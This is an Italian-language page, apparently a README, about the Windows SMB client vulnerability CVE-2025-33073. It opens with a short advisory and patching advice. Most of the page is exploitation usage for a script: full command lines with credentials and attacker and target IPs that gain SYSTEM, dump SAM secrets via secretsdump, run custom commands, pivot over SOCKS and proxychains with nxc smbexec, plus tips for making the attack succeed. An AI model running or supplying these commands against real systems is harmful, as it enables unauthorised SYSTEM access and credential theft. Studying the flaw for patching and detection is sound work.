
CVE-2025-33073
🔥 Esecuzione Remota di Codice Autenticata ad Alta Severità 🔥 Controllo di Accesso Inappropriato nel Client SMB di Windows (CWE-284)
| Aspetto | Dettagli |
|---|
| Punteggio CVSS v3.1 | 8.8 (Alto) 🔥 |
| Sistemi Interessati | Windows 10, 11, Server 2012–2025 (tutte le edizioni) 💻 |
| Data di Divulgazione | 10 giugno 2025 📅 (Corretto nel Patch Tuesday di giugno 2025) |
| Sfruttamento | Sfruttato attivamente in natura 😱 Aggiunto al CISA KEV il 21 ottobre 2025 |
| Vettore di Attacco | Rete (Autenticato) 🌐 |
| Impatto | Esecuzione di codice a livello SYSTEM 👑 Movimento laterale tramite relay Kerberos |
| Bypass | Mitigazioni di riflessione NTLM ⚡ |
Applica la patch ora! 🔧
→ Applica gli aggiornamenti Microsoft (es. KB5060998)
→ Guida agli Aggiornamenti Microsoft 🔗
Abilita la firma SMB ✍️
→ Impila su tutti i client e server
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
Limita NTLM 🚫
→ Blocca NTLM dove possibile
→ Monitora i tentativi di relay con strumenti EDR
Correzione automatica? 🤖
→ Usa Vicarius vRx o script personalizzati per la correzione di massa
Stato al 15 novembre 2025:
✅ Corretto
❌ Ancora sfruttato in sistemi non aggiornati
🔔 Scadenza CISA: 10 novembre 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Comando personalizzato Invece di eseguire secretsdump, è possibile eseguire un comando personalizzato.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS Per un'esecuzione più furtiva dei comandi dopo aver stabilito una connessione valida come SYSTEM. --target e --target-ip dovrebbero essere uguali qui.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

Inoltre, un comando personalizzato può essere eseguito tramite proxychains invece di scaricare SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Se ti trovi nello stesso dominio broadcast del dispositivo ed è vulnerabile all'avvelenamento LLMNR, è possibile sfruttare un dispositivo senza dover registrare un record DNS.

A volte l'attacco non funziona perché viene utilizzato l'hostname per l'attacco, il che comporta una query DNS da Kali. Se Kali non sta usando il server DNS o ricevi un messaggio '/ FAILED' da impacket-ntlmrelayx, prova ad aggiungere l'host al file /etc/hosts. Ciò dovrebbe far funzionare l'attacco.
Se si utilizza l'IP, l'attacco dovrebbe funzionare. A volte eseguirlo più volte porta a un SUCCESSO invece che a un fallimento. Fino ad ora non è perfettamente chiaro perché ciò accada. Penso abbia a che fare con il networking.
Prova un altro metodo di coercizione usando -M o --method.
Autenticazione NTLM locale avvenuta

Autenticazione NTLM locale non avvenuta, risultante in un tentativo FALLITO

Non aspettare — applica la patch oggi! 🛑
La sicurezza della tua rete dipende da questo. 💪